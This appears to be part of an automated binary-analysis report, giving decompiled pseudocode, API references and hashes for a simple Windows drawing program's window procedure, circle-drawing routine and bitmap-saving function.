                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: Window$Create$Destroy$Proc
                                              • String ID: 128px$256px$32px$64px$button$button$button$button
                                              • API String ID: 3952264185-740826005
                                              • Opcode ID: 216e3887d6d73487e7b5a9338cc8fd2210a8a55af58d492f38a60c0944ff06a4
                                              • Instruction ID: c6d594fe9e2ba9dd701f18af6f1a68252f1e5e04e61b8b6f80d1c4b09b4f4056
                                              • Opcode Fuzzy Hash: 216e3887d6d73487e7b5a9338cc8fd2210a8a55af58d492f38a60c0944ff06a4
                                              • Instruction Fuzzy Hash: 4721F9753D034CBBFB25DE50DD5AFEA7625AB08F41F104114FB096E1D1D2F1AA409754
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 94%
                                              			E002FCE30(struct HWND__* _a4, int _a8, int _a12, signed int _a16) {
                                              				struct HDC__* _v8;
                                              				int _v12;
                                              				signed int _v16;
                                              				signed int _v20;
                                              				intOrPtr _v24;
                                              				signed int _v28;
                                              				signed int _v32;
                                              				struct tagPAINTSTRUCT _v96;
                                              				int _t89;
                                              				int _t91;
                                              				int _t98;
                                              				intOrPtr _t100;
                                              				long _t102;
                                              				int _t103;
                                              				int _t105;
                                              				long _t106;
                                              				int _t107;
                                              				intOrPtr _t120;
                                              				void* _t122;
                                              				int _t123;
                                              				long _t125;
                                              				int _t126;
                                              				int _t129;
                                              				int _t139;
                                              				int _t140;
                                              				void* _t141;
                                              				void* _t145;
                                              				int _t146;
                                              				int _t148;
                                              				int _t149;
                                              				int _t152;
                                              				int _t154;
                                              				int _t155;
                                              				int _t158;
                                              				intOrPtr _t160;
                                              				intOrPtr _t168;
                                              				int _t178;
                                              				int _t179;
                                              				long _t180;
                                              				int _t182;
                                              				int _t183;
                                              				long _t187;
                                              				int _t188;
                                              				int _t189;
                                              				int _t191;
                                              				intOrPtr _t192;
                                              				int _t198;
                                              				int _t199;
                                              				long _t200;
                                              				int _t201;
                                              				int _t202;
                                              				int _t203;
                                              				int _t207;
                                              				long _t212;
                                              				int _t213;
                                              				intOrPtr _t214;
                                              				int _t219;
                                              				int _t220;
                                              				long _t222;
                                              				int _t224;
                                              				int _t225;
                                              				long _t226;
                                              				intOrPtr _t228;
                                              				intOrPtr _t229;
                                              				int _t235;
                                              				intOrPtr _t237;
                                              				long _t240;
                                              				int _t241;
                                              				long _t247;
                                              				int _t248;
                                              				int _t249;
                                              				int _t251;
                                              				long _t253;
                                              				int _t254;
                                              				long _t255;
                                              				int _t256;
                                              				long _t257;
                                              				int _t258;
                                              				long _t259;
                                              				int _t260;
                                              				int _t262;
                                              
                                              				_v12 = _a8;
                                              				if(_v12 > 0x200) {
                                              					__eflags = _v12 - 0x201;
                                              					if(_v12 == 0x201) {
                                              						 *0x305990 = _a16 & 0xffff;
                                              						 *0x305988 = _a16 >> 0x00000010 & 0xffff;
                                              						_t219 =  *0x305990; // 0x0
                                              						 *0x305994 = _t219;
                                              						_t89 =  *0x305988; // 0x0
                                              						 *0x30598c = _t89;
                                              						 *0x305940 = 1;
                                              						_t174 = _a4;
                                              						_v8 = GetDC(_a4);
                                              						__eflags =  *0x304b3c - 2;
                                              						if( *0x304b3c == 2) {
                                              							_t220 =  *0x305988; // 0x0
                                              							_t91 =  *0x305990; // 0x0
                                              							 *0x304a00 = GetPixel(_v8, _t91, _t220);
                                              						} else {
                                              							_t229 =  *0x3059c0; // 0x12f0ef0
                                              							__eflags =  *((intOrPtr*)(_t229 + 8)) -  *0x3059c4; // 0x12f1028
                                              							if(__eflags != 0) {
                                              								_t174 =  *0x3059c0; // 0x12f0ef0
                                              								E002FB910(_t174);
                                              							}
                                              							E002FC2C0(_t174, 0x3059c4, 0x3059c0);
                                              						}
                                              						__eflags =  *0x304b3c - 5;
                                              						if( *0x304b3c != 5) {
                                              							_t226 =  *0x304a00; // 0xffffff
                                              							_t105 =  *0x305988; // 0x0
                                              							_t182 =  *0x305990; // 0x0
                                              							_t106 = GetPixel(_v8, _t182, _t105);
                                              							_t107 =  *0x305988; // 0x0
                                              							_t183 =  *0x305990; // 0x0
                                              							_t228 =  *0x3059c0; // 0x12f0ef0
                                              							E002FC390(_t183, _t228, _t183, _t107, _t106, _t226);
                                              						}
                                              						__eflags =  *0x304b3c - 6;
                                              						if(__eflags != 0) {
                                              							__eflags =  *0x304b3c - 5;
                                              							if( *0x304b3c != 5) {
                                              								_t222 =  *0x304a00; // 0xffffff
                                              								_t98 =  *0x305988; // 0x0
                                              								_t178 =  *0x305990; // 0x0
                                              								SetPixel(_v8, _t178, _t98, _t222);
                                              							}
                                              						} else {
                                              							_t100 =  *0x3059c0; // 0x12f0ef0
                                              							_t179 =  *0x305988; // 0x0
                                              							_t224 =  *0x305990; // 0x0
                                              							_t102 = GetPixel(_v8, _t224, _t179);
                                              							_t180 =  *0x304a00; // 0xffffff
                                              							_t225 =  *0x305988; // 0x0
                                              							_t103 =  *0x305990; // 0x0
                                              							E002FB540(__eflags, _v8, _t103, _t225, _t180, _t102, 0, 0, 0, _t100);
                                              						}
                                              						ReleaseDC(_a4, _v8);
                                              						L55:
                                              						return DefWindowProcW(_a4, _a8, _a12, _a16);
                                              					}
                                              					__eflags = _v12 - 0x202;
                                              					if(_v12 == 0x202) {
                                              						 *0x305940 = 0;
                                              						_v8 = GetDC(_a4);
                                              						__eflags =  *0x304b3c - 4;
                                              						if( *0x304b3c == 4) {
                                              							L39:
                                              							SelectObject(_v8, GetStockObject(5));
                                              							_v32 = _a16 & 0xffff;
                                              							_v28 = _a16 >> 0x00000010 & 0xffff;
                                              							__eflags =  *0x304b3c - 4;
                                              							if( *0x304b3c != 4) {
                                              								__eflags =  *0x304b3c - 3;
                                              								if( *0x304b3c != 3) {
                                              									__eflags =  *0x304b3c - 5;
                                              									if( *0x304b3c == 5) {
                                              										_push(1);
                                              										_t120 =  *0x3059c0; // 0x12f0ef0
                                              										_t187 =  *0x304a00; // 0xffffff
                                              										_t188 =  *0x305988; // 0x0
                                              										_t235 =  *0x305990; // 0x0
                                              										_t122 = E002FB900(_v32, _t235, _t188, _v32, _v28);
                                              										_t123 =  *0x305988; // 0x0
                                              										_t189 =  *0x305990; // 0x0
                                              										E002FB9D0(_v8, _t189, _t123, _t122, _t187, _t120, 1);
                                              									}
                                              								} else {
                                              									_t237 =  *0x3059c0; // 0x12f0ef0
                                              									_t125 =  *0x304a00; // 0xffffff
                                              									_t126 =  *0x305988; // 0x0
                                              									_t191 =  *0x305990; // 0x0
                                              									E002FBE50(_v8, _v8, _t191, _t126, _v32, _v28, _t125, _t237, 1, 1);
                                              								}
                                              							} else {
                                              								_t192 =  *0x3059c0; // 0x12f0ef0
                                              								_t240 =  *0x304a00; // 0xffffff
                                              								_t241 =  *0x305988; // 0x0
                                              								_t129 =  *0x305990; // 0x0
                                              								E002FBD50(_v8, _t129, _t241, _v32, _v28, _t240, _t192, 1, 1);
                                              							}
                                              							L45:
                                              							ReleaseDC(_a4, _v8);
                                              							goto L55;
                                              						}
                                              						__eflags =  *0x304b3c - 3;
                                              						if( *0x304b3c == 3) {
                                              							goto L39;
                                              						}
                                              						__eflags =  *0x304b3c - 5;
                                              						if( *0x304b3c != 5) {
                                              							goto L45;
                                              						}
                                              						goto L39;
                                              					} else {
                                              						goto L55;
                                              					}
                                              				}
                                              				if(_v12 == 0x200) {
                                              					__eflags =  *0x305940 - 1;
                                              					if( *0x305940 != 1) {
                                              						L35:
                                              						goto L55;
                                              					}
                                              					_v8 = GetDC(_a4);
                                              					_v16 = _a16 & 0xffff;
                                              					_v20 = _a16 >> 0x00000010 & 0xffff;
                                              					__eflags =  *0x304b3c - 1;
                                              					if( *0x304b3c != 1) {
                                              						L25:
                                              						__eflags =  *0x304b3c - 4;
                                              						if( *0x304b3c == 4) {
                                              							L28:
                                              							SetROP2(_v8, 6);
                                              							__eflags =  *0x304b3c - 4;
                                              							if( *0x304b3c != 4) {
                                              								__eflags =  *0x304b3c - 3;
                                              								if( *0x304b3c != 3) {
                                              									__eflags =  *0x304b3c - 5;
                                              									if( *0x304b3c == 5) {
                                              										_push(0);
                                              										_t247 =  *0x304a00; // 0xffffff
                                              										_t139 =  *0x30598c; // 0x0
                                              										_t198 =  *0x305994; // 0x0
                                              										_t248 =  *0x305988; // 0x0
                                              										_t140 =  *0x305990; // 0x0
                                              										_t141 = E002FB900(_t140, _t140, _t248, _t198, _t139);
                                              										_t199 =  *0x305988; // 0x0
                                              										_t249 =  *0x305990; // 0x0
                                              										E002FB9D0(_v8, _t249, _t199, _t141, _t247, 0, 0);
                                              										_push(0);
                                              										_t200 =  *0x304a00; // 0xffffff
                                              										_t201 =  *0x305988; // 0x0
                                              										_t251 =  *0x305990; // 0x0
                                              										_t145 = E002FB900(_v16, _t251, _t201, _v16, _v20);
                                              										_t146 =  *0x305988; // 0x0
                                              										_t202 =  *0x305990; // 0x0
                                              										E002FB9D0(_v8, _t202, _t146, _t145, _t200, 0, 0);
                                              									}
                                              								} else {
                                              									_t253 =  *0x304a00; // 0xffffff
                                              									_t148 =  *0x30598c; // 0x0
                                              									_t203 =  *0x305994; // 0x0
                                              									_t254 =  *0x305988; // 0x0
                                              									_t149 =  *0x305990; // 0x0
                                              									E002FBE50(_t254, _v8, _t149, _t254, _t203, _t148, _t253, 0, 0, 0);
                                              									_t255 =  *0x304a00; // 0xffffff
                                              									_t256 =  *0x305988; // 0x0
                                              									_t152 =  *0x305990; // 0x0
                                              									E002FBE50(_t256, _v8, _t152, _t256, _v16, _v20, _t255, 0, 0, 0);
                                              								}
                                              							} else {
                                              								_t257 =  *0x304a00; // 0xffffff
                                              								_t154 =  *0x30598c; // 0x0
                                              								_t207 =  *0x305994; // 0x0
                                              								_t258 =  *0x305988; // 0x0
                                              								_t155 =  *0x305990; // 0x0
                                              								E002FBD50(_v8, _t155, _t258, _t207, _t154, _t257, 0, 0, 0);
                                              								_t259 =  *0x304a00; // 0xffffff
                                              								_t260 =  *0x305988; // 0x0
                                              								_t158 =  *0x305990; // 0x0
                                              								E002FBD50(_v8, _t158, _t260, _v16, _v20, _t259, 0, 0, 0);
                                              							}
                                              							L34:
                                              							 *0x305994 = _v16;
                                              							 *0x30598c = _v20;
                                              							ReleaseDC(_a4, _v8);
                                              							goto L35;
                                              						}
                                              						__eflags =  *0x304b3c - 3;
                                              						if( *0x304b3c == 3) {
                                              							goto L28;
                                              						}
                                              						__eflags =  *0x304b3c - 5;
                                              						if( *0x304b3c != 5) {
                                              							goto L34;
                                              						}
                                              						goto L28;
                                              					}
                                              					__eflags = _v16 -  *0x305994; // 0x0
                                              					if(__eflags != 0) {
                                              						L24:
                                              						_t160 =  *0x3059c0; // 0x12f0ef0
                                              						_t212 =  *0x304a00; // 0xffffff
                                              						_t213 =  *0x30598c; // 0x0
                                              						_t262 =  *0x305994; // 0x0
                                              						E002FBE50(_t262, _v8, _t262, _t213, _v16, _v20, _t212, _t160, 1, 0);
                                              						goto L34;
                                              					}
                                              					__eflags = _v20 -  *0x30598c; // 0x0
                                              					if(__eflags == 0) {
                                              						goto L25;
                                              					}
                                              					goto L24;
                                              				}
                                              				if(_v12 == 2) {
                                              					PostQuitMessage(0);
                                              					goto L55;
                                              				}
                                              				if(_v12 == 0xf) {
                                              					_v8 = BeginPaint(_a4,  &_v96);
                                              					_t214 =  *0x3059b0; // 0x12f0ef0
                                              					_v24 = _t214;
                                              					while(1) {
                                              						__eflags = 1;
                                              						if(1 == 0) {
                                              							break;
                                              						}
                                              						_v24 =  *((intOrPtr*)(_v24 + 8));
                                              						__eflags = _v24 -  *0x3059c4; // 0x12f1028
                                              						if(__eflags == 0) {
                                              							L51:
                                              							break;
                                              						}
                                              						_t168 =  *0x3059c0; // 0x12f0ef0
                                              						__eflags = _v24 -  *((intOrPtr*)(_t168 + 8));
                                              						if(_v24 !=  *((intOrPtr*)(_t168 + 8))) {
                                              							E002FC0F0(_v24, _a4);
                                              							continue;
                                              						}
                                              						goto L51;
                                              					}
                                              					EndPaint(_a4,  &_v96);
                                              				} else {
                                              				}
                                              			}




















































































                                              0x002fce39
                                              0x002fce43
                                              0x002fce6b
                                              0x002fce72
                                              0x002fce92
                                              0x002fcea6
                                              0x002fceac
                                              0x002fceb2
                                              0x002fceb8
                                              0x002fcebd
                                              0x002fcec2
                                              0x002fcecc
                                              0x002fced6
                                              0x002fced9
                                              0x002fcee0
                                              0x002fcf10
                                              0x002fcf17
                                              0x002fcf27
                                              0x002fcee2
                                              0x002fcee2
                                              0x002fceeb
                                              0x002fcef1
                                              0x002fcef3
                                              0x002fcefa
                                              0x002fcefa
                                              0x002fcf09
                                              0x002fcf09
                                              0x002fcf2c
                                              0x002fcf33
                                              0x002fcf35
                                              0x002fcf3c
                                              0x002fcf42
                                              0x002fcf4d
                                              0x002fcf54
                                              0x002fcf5a
                                              0x002fcf61
                                              0x002fcf68
                                              0x002fcf68
                                              0x002fcf6d
                                              0x002fcf74
                                              0x002fcfba
                                              0x002fcfc1
                                              0x002fcfc3
                                              0x002fcfca
                                              0x002fcfd0
                                              0x002fcfdb
                                              0x002fcfdb
                                              0x002fcf76
                                              0x002fcf76
                                              0x002fcf82
                                              0x002fcf89
                                              0x002fcf94
                                              0x002fcf9b
                                              0x002fcfa2
                                              0x002fcfa9
                                              0x002fcfb3
                                              0x002fcfb3
                                              0x002fcfe9
                                              0x002fd3df
                                              0x002fd3f8
                                              0x002fd3f8
                                              0x002fce74
                                              0x002fce7b
                                              0x002fd233
                                              0x002fd247
                                              0x002fd24a
                                              0x002fd251
                                              0x002fd269
                                              0x002fd276
                                              0x002fd287
                                              0x002fd299
                                              0x002fd29c
                                              0x002fd2a3
                                              0x002fd2da
                                              0x002fd2e1
                                              0x002fd314
                                              0x002fd31b
                                              0x002fd31d
                                              0x002fd321
                                              0x002fd327
                                              0x002fd336
                                              0x002fd33d
                                              0x002fd344
                                              0x002fd34a
                                              0x002fd350
                                              0x002fd35b
                                              0x002fd35b
                                              0x002fd2e3
                                              0x002fd2e7
                                              0x002fd2ee
                                              0x002fd2fc
                                              0x002fd302
                                              0x002fd30d
                                              0x002fd30d
                                              0x002fd2a5
                                              0x002fd2a9
                                              0x002fd2b0
                                              0x002fd2bf
                                              0x002fd2c6
                                              0x002fd2d0
                                              0x002fd2d0
                                              0x002fd360
                                              0x002fd368
                                              0x00000000
                                              0x002fd368
                                              0x002fd253
                                              0x002fd25a
                                              0x00000000
                                              0x00000000
                                              0x002fd25c
                                              0x002fd263
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002fce81
                                              0x00000000
                                              0x002fce81
                                              0x002fce7b
                                              0x002fce4c
                                              0x002fcff4
                                              0x002fcffb
                                              0x002fd22e
                                              0x00000000
                                              0x002fd22e
                                              0x002fd00b
                                              0x002fd019
                                              0x002fd02b
                                              0x002fd02e
                                              0x002fd035
                                              0x002fd082
                                              0x002fd082
                                              0x002fd089
                                              0x002fd0a1
                                              0x002fd0a7
                                              0x002fd0ad
                                              0x002fd0b4
                                              0x002fd116
                                              0x002fd11d
                                              0x002fd17f
                                              0x002fd186
                                              0x002fd18c
                                              0x002fd192
                                              0x002fd199
                                              0x002fd19f
                                              0x002fd1a6
                                              0x002fd1ad
                                              0x002fd1b3
                                              0x002fd1b9
                                              0x002fd1c0
                                              0x002fd1cb
                                              0x002fd1d0
                                              0x002fd1d6
                                              0x002fd1e5
                                              0x002fd1ec
                                              0x002fd1f3
                                              0x002fd1f9
                                              0x002fd1ff
                                              0x002fd20a
                                              0x002fd20a
                                              0x002fd11f
                                              0x002fd125
                                              0x002fd12c
                                              0x002fd132
                                              0x002fd139
                                              0x002fd140
                                              0x002fd14a
                                              0x002fd155
                                              0x002fd164
                                              0x002fd16b
                                              0x002fd175
                                              0x002fd175
                                              0x002fd0b6
                                              0x002fd0bc
                                              0x002fd0c3
                                              0x002fd0c9
                                              0x002fd0d0
                                              0x002fd0d7
                                              0x002fd0e1
                                              0x002fd0ec
                                              0x002fd0fb
                                              0x002fd102
                                              0x002fd10c
                                              0x002fd10c
                                              0x002fd20f
                                              0x002fd212
                                              0x002fd21a
                                              0x002fd228
                                              0x00000000
                                              0x002fd228
                                              0x002fd08b
                                              0x002fd092
                                              0x00000000
                                              0x00000000
                                              0x002fd094
                                              0x002fd09b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002fd09b
                                              0x002fd03a
                                              0x002fd040
                                              0x002fd04d
                                              0x002fd051
                                              0x002fd057
                                              0x002fd066
                                              0x002fd06d
                                              0x002fd078
                                              0x00000000
                                              0x002fd078
                                              0x002fd045
                                              0x002fd04b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002fd04b
                                              0x002fce56
                                              0x002fd372
                                              0x00000000
                                              0x002fd372
                                              0x002fce60
                                              0x002fd388
                                              0x002fd38b
                                              0x002fd391
                                              0x002fd394
                                              0x002fd399
                                              0x002fd39b
                                              0x00000000
                                              0x00000000
                                              0x002fd3a3
                                              0x002fd3a9
                                              0x002fd3af
                                              0x002fd3be
                                              0x00000000
                                              0x002fd3be
                                              0x002fd3b1
                                              0x002fd3b9
                                              0x002fd3bc
                                              0x002fd3ca
                                              0x00000000
                                              0x002fd3cf
                                              0x00000000
                                              0x002fd3bc
                                              0x002fd3d9
                                              0x00000000
                                              0x002fce66

                                              APIs
                                              • GetDC.USER32(00000200), ref: 002FD005
                                              • ReleaseDC.USER32 ref: 002FD228
                                              • PostQuitMessage.USER32(00000000), ref: 002FD372
                                              • BeginPaint.USER32(0000000F,?), ref: 002FD382
                                              • EndPaint.USER32(0000000F,?), ref: 002FD3D9
                                              • DefWindowProcW.USER32(00000201,?,?,?), ref: 002FD3EF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: Paint$BeginMessagePostProcQuitReleaseWindow
                                              • String ID:
                                              • API String ID: 76768696-0
                                              • Opcode ID: eed4006fac38964ef7ae2366e636e574910da7223499f764b43d4d7463a9f399
                                              • Instruction ID: f9d3ce9085b596cb68455e6053cb47681f63e8956b31e91e5b9020cdb8df749c
                                              • Opcode Fuzzy Hash: eed4006fac38964ef7ae2366e636e574910da7223499f764b43d4d7463a9f399
                                              • Instruction Fuzzy Hash: 1B02EAB5612508EFCB15CF99ECA4E7BB7BABB48750F10851AF309972A0C770A950CF64
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002FB9D0(struct HDC__* _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, long _a20, intOrPtr _a24, intOrPtr _a28) {
                                              				intOrPtr _v8;
                                              				signed int _v12;
                                              				intOrPtr _v16;
                                              				intOrPtr _v20;
                                              				intOrPtr _v24;
                                              				intOrPtr _t176;
                                              
                                              				_v16 = 1 - _a16;
                                              				_v8 = 0;
                                              				_v12 = _a16;
                                              				_v20 = 3;
                                              				_t176 = 5 - (_a16 << 1);
                                              				_v24 = 5;
                                              				while(_v12 >= _v8) {
                                              					if(_a28 != 0) {
                                              						E002FC390(_a24, _a24, _a8 + _v8, _a12 + _v12, 0xffffff - GetPixel(_a4, _a8 + _v8, _a12 + _v12), _a20);
                                              						E002FC390(_a24, _a24, _a8 + _v12, _a12 + _v8, 0xffffff - GetPixel(_a4, _a8 + _v12, _a12 + _v8), _a20);
                                              						E002FC390(_a24, _a24, _a8 + _v8, _a12 - _v12, 0xffffff - GetPixel(_a4, _a8 + _v8, _a12 - _v12), _a20);
                                              						E002FC390(_a24, _a24, _a8 - _v12, _a12 + _v8, 0xffffff - GetPixel(_a4, _a8 - _v12, _a12 + _v8), _a20);
                                              						E002FC390(_a24, _a24, _a8 + _v12, _a12 - _v8, 0xffffff - GetPixel(_a4, _a8 + _v12, _a12 - _v8), _a20);
                                              						E002FC390(_a24, _a24, _a8 - _v8, _a12 - _v12, 0xffffff - GetPixel(_a4, _a8 - _v8, _a12 - _v12), _a20);
                                              						E002FC390(_a24, _a24, _a8 - _v12, _a12 - _v8, 0xffffff - GetPixel(_a4, _a8 - _v12, _a12 - _v8), _a20);
                                              						E002FC390(_a24, _a24, _a8 - _v8, _a12 + _v12, 0xffffff - GetPixel(_a4, _a8 - _v8, _a12 + _v12), _a20);
                                              					}
                                              					SetPixel(_a4, _a8 + _v8, _a12 + _v12, _a20);
                                              					SetPixel(_a4, _a8 + _v8, _a12 - _v12, _a20);
                                              					if(_v8 != _v12) {
                                              						SetPixel(_a4, _a8 + _v12, _a12 + _v8, _a20);
                                              						SetPixel(_a4, _a8 - _v12, _a12 + _v8, _a20);
                                              					}
                                              					if(_v8 != 0) {
                                              						SetPixel(_a4, _a8 - _v8, _a12 + _v12, _a20);
                                              						SetPixel(_a4, _a8 - _v8, _a12 - _v12, _a20);
                                              					}
                                              					if(_v8 != _v12 && _v8 != 0) {
                                              						SetPixel(_a4, _a8 + _v12, _a12 - _v8, _a20);
                                              						SetPixel(_a4, _a8 - _v12, _a12 - _v8, _a20);
                                              					}
                                              					if(_v16 >= 0) {
                                              						_v16 = _v16 + _v24;
                                              						_v20 = _v20 + 2;
                                              						_v24 = _v24 + 4;
                                              						_t176 = _v12 - 1;
                                              						_v12 = _t176;
                                              					} else {
                                              						_t176 = _v16 + _v20;
                                              						_v16 = _t176;
                                              						_v20 = _v20 + 2;
                                              						_v24 = _v24 + 2;
                                              					}
                                              					_v8 = _v8 + 1;
                                              				}
                                              				return _t176;
                                              			}









                                              0x002fb9de
                                              0x002fb9e1
                                              0x002fb9eb
                                              0x002fb9ee
                                              0x002fb9ff
                                              0x002fba01
                                              0x002fba04
                                              0x002fba14
                                              0x002fba50
                                              0x002fba8b
                                              0x002fbac6
                                              0x002fbb01
                                              0x002fbb3c
                                              0x002fbb77
                                              0x002fbbb2
                                              0x002fbbed
                                              0x002fbbed
                                              0x002fbc08
                                              0x002fbc24
                                              0x002fbc30
                                              0x002fbc48
                                              0x002fbc64
                                              0x002fbc64
                                              0x002fbc6e
                                              0x002fbc86
                                              0x002fbca2
                                              0x002fbca2
                                              0x002fbcae
                                              0x002fbccc
                                              0x002fbce8
                                              0x002fbce8
                                              0x002fbcf2
                                              0x002fbd17
                                              0x002fbd20
                                              0x002fbd29
                                              0x002fbd2f
                                              0x002fbd32
                                              0x002fbcf4
                                              0x002fbcf7
                                              0x002fbcfa
                                              0x002fbd03
                                              0x002fbd0c
                                              0x002fbd0c
                                              0x002fbd3b
                                              0x002fbd3b
                                              0x002fbd46

                                              APIs
                                              • GetPixel.GDI32(?,00000000,?), ref: 002FBA30
                                              • GetPixel.GDI32(?,?,00000000), ref: 002FBA6B
                                              • GetPixel.GDI32(?,00000000,?), ref: 002FBAA6
                                              • GetPixel.GDI32(?,?,00000000), ref: 002FBAE1
                                              • GetPixel.GDI32(?,?,00000000), ref: 002FBB1C
                                              • GetPixel.GDI32(?,00000000,?), ref: 002FBB57
                                              • GetPixel.GDI32(?,?,00000000), ref: 002FBB92
                                              • GetPixel.GDI32(?,00000000,?), ref: 002FBBCD
                                              • SetPixel.GDI32(?,00000000,?,?), ref: 002FBC08
                                              • SetPixel.GDI32(?,00000000,?,?), ref: 002FBC24
                                              • SetPixel.GDI32(?,?,00000000,?), ref: 002FBC48
                                              • SetPixel.GDI32(?,?,00000000,?), ref: 002FBC64
                                              • SetPixel.GDI32(?,00000000,?,?), ref: 002FBC86
                                              • SetPixel.GDI32(?,00000000,?,?), ref: 002FBCA2
                                              • SetPixel.GDI32(?,?,00000000,?), ref: 002FBCCC
                                              • SetPixel.GDI32(?,?,00000000,?), ref: 002FBCE8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: Pixel
                                              • String ID:
                                              • API String ID: 3195210534-0
                                              • Opcode ID: 82e5d0e6bd46545fea573c4454ddfd597380d12e8f6077e61950101e6268d8d4
                                              • Instruction ID: ff76207a708b271be82467342edb7cdf6b54f46a92851b53fe10a231f359e6ae
                                              • Opcode Fuzzy Hash: 82e5d0e6bd46545fea573c4454ddfd597380d12e8f6077e61950101e6268d8d4
                                              • Instruction Fuzzy Hash: 1AD176B6510109EFCB04CFACD994DEFBBB9BF88350F108658FA1997254C630EA51DB64
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 85%
                                              			E002FB350(struct HBITMAP__* _a4, WCHAR* _a8) {
                                              				struct tagBITMAPINFO* _v8;
                                              				signed int _v12;
                                              				long _v16;
                                              				struct HDC__* _v20;
                                              				void* _v24;
                                              				signed int _v28;
                                              				long _v32;
                                              				intOrPtr _v38;
                                              				short _v40;
                                              				short _v42;
                                              				intOrPtr _v46;
                                              				void _v48;
                                              				signed short _v54;
                                              				signed short _v56;
                                              				int _v64;
                                              				signed int _v68;
                                              				void _v72;
                                              				struct HWND__* _v76;
                                              				struct HWND__* _v80;
                                              				struct HWND__* _v84;
                                              				struct HWND__* _v88;
                                              				signed int _v92;
                                              				struct HWND__* _v96;
                                              				signed int _v98;
                                              				short _v100;
                                              				int _v104;
                                              				signed int _v108;
                                              				void _v112;
                                              
                                              				_v20 = GetDC(0);
                                              				GetObjectW(_a4, 0x18,  &_v72);
                                              				_v112 = 0x28;
                                              				_v108 = _v68;
                                              				_v104 = _v64;
                                              				_v100 = 1;
                                              				_v98 = (_v56 & 0x0000ffff) * (_v54 & 0x0000ffff);
                                              				if((_v98 & 0x0000ffff) > 8) {
                                              					_v98 = 0x18;
                                              				}
                                              				_v96 = 0;
                                              				_v92 = 0;
                                              				_v88 = 0;
                                              				_v84 = 0;
                                              				_v80 = 0;
                                              				_v76 = 0;
                                              				if((_v98 & 0x0000ffff) != 0x18) {
                                              					_v28 = 1 << (_v98 & 0x0000ffff);
                                              				} else {
                                              					_v28 = 0;
                                              				}
                                              				_v12 = _v28 << 2;
                                              				_push(_v112 + _v12);
                                              				_v8 = E002F2487(_v112 + _v12);
                                              				memcpy(_v8,  &_v112, 0xa << 2);
                                              				GetDIBits(_v20, _a4, 0, _v64, 0, _v8, 0);
                                              				memcpy( &_v112, _v8, 0xa << 2);
                                              				if(_v92 == 0) {
                                              					_v92 = (((_v98 & 0x0000ffff) * _v108 + 0x0000001f & 0xffffffe0) >> 3) * _v104;
                                              				}
                                              				_v16 = _v112 + _v12 + _v92;
                                              				_push(_v16);
                                              				_push(_v8);
                                              				_v8 = E002F2477(_v112 + _v12 + _v92, _v16);
                                              				GetDIBits(_v20, _a4, 0, _v64, _v8 + _v112 + _v12, _v8, 0);
                                              				_v38 = _v12 + 0x36;
                                              				_v42 = 0;
                                              				_v40 = 0;
                                              				_v46 = _v16 + 0xe;
                                              				_v48 = 0x4d42;
                                              				_v24 = CreateFileW(_a8, 0x40000000, 0, 0, 2, 0x80, 0);
                                              				WriteFile(_v24,  &_v48, 0xe,  &_v32, 0);
                                              				WriteFile(_v24, _v8, _v16,  &_v32, 0);
                                              				ReleaseDC(0, _v20);
                                              				return CloseHandle(_v24);
                                              			}































                                              0x002fb360
                                              0x002fb36d
                                              0x002fb373
                                              0x002fb37d
                                              0x002fb383
                                              0x002fb38b
                                              0x002fb39a
                                              0x002fb3a5
                                              0x002fb3ac
                                              0x002fb3ac
                                              0x002fb3b0
                                              0x002fb3b7
                                              0x002fb3be
                                              0x002fb3c5
                                              0x002fb3cc
                                              0x002fb3d3
                                              0x002fb3e1
                                              0x002fb3f7
                                              0x002fb3e3
                                              0x002fb3e3
                                              0x002fb3e3
                                              0x002fb400
                                              0x002fb409
                                              0x002fb412
                                              0x002fb420
                                              0x002fb438
                                              0x002fb449
                                              0x002fb44f
                                              0x002fb466
                                              0x002fb466
                                              0x002fb472
                                              0x002fb478
                                              0x002fb47c
                                              0x002fb485
                                              0x002fb4a6
                                              0x002fb4b2
                                              0x002fb4b7
                                              0x002fb4bd
                                              0x002fb4c7
                                              0x002fb4cf
                                              0x002fb4ef
                                              0x002fb502
                                              0x002fb51a
                                              0x002fb526
                                              0x002fb53b

                                              APIs
                                              • GetDC.USER32(00000000), ref: 002FB35A
                                              • GetObjectW.GDI32(?,00000018,?), ref: 002FB36D
